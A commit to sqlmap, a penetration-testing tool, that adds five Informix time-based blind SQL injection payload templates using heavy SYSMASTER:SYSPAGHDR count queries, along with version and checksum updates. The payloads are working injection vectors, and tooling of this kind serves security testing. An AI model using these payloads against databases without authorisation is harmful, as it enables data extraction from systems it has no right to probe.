Adding time-based blind (heavy query) payloads for Informix (Issue #552)

stamparm · stamparm · commit d36b5c0a4b8f · 2016-09-28T10:30:09.000+02:00
diff --git a/lib/core/settings.py b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.revision import getRevisionNumber
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.0.9.45"
+VERSION = "1.0.9.46"
 REVISION = getRevisionNumber()
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
diff --git a/txt/checksum.md5 b/txt/checksum.md5
@@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6  lib/core/readlineng.py
 5ef56abb8671c2ca6ceecb208258e360  lib/core/replication.py
 99a2b496b9d5b546b335653ca801153f  lib/core/revision.py
 7c15dd2777af4dac2c89cab6df17462e  lib/core/session.py
-5cd9c085558c79b12f5757611a76eb36  lib/core/settings.py
+3f2deb69d28171ca0c00708ce0255ee8  lib/core/settings.py
 7af83e4f18cab6dff5e67840eb65be80  lib/core/shell.py
 23657cd7d924e3c6d225719865855827  lib/core/subprocessng.py
 0bc2fae1dec18cdd11954b22358293f2  lib/core/target.py
@@ -453,6 +453,6 @@ a279656ea3fcb85c727249b02f828383  xml/livetests.xml
 103a4c9b12c582b24a3fac8147a9c8d4  xml/payloads/error_based.xml
 06b1a210b190d52477a9d492443725b5  xml/payloads/inline_query.xml
 96adb9bfbab867d221974d3ddb303cb6  xml/payloads/stacked_queries.xml
-c8b152ecebf04ec997e52c6c78cbd488  xml/payloads/time_blind.xml
+9abc699fadede1e31586c2263ca900a4  xml/payloads/time_blind.xml
 033b39025e8ee0f302935f6db3a39e77  xml/payloads/union_query.xml
 1587a02322a96ac48973e782d6fedf73  xml/queries.xml
diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml
@@ -1337,7 +1337,85 @@
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
+
+    <test>
+        <title>Informix AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Informix OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Informix AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Informix OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
     <!-- End of time-based boolean tests -->
 
     <!-- Time-based boolean tests - Numerous clauses -->
@@ -1697,7 +1775,7 @@
             <dbms>IBM DB2</dbms>
         </details>
     </test>
-    
+
     <!-- Untested -->
     <test>
         <title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
@@ -1738,6 +1816,25 @@
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
+
+    <test>
+        <title>Informix time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>3</where>
+        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
     <!-- End of time-based boolean tests - Parameter replace -->
 
     <!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->
@@ -1938,6 +2035,6 @@
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
+
     <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
 </root>
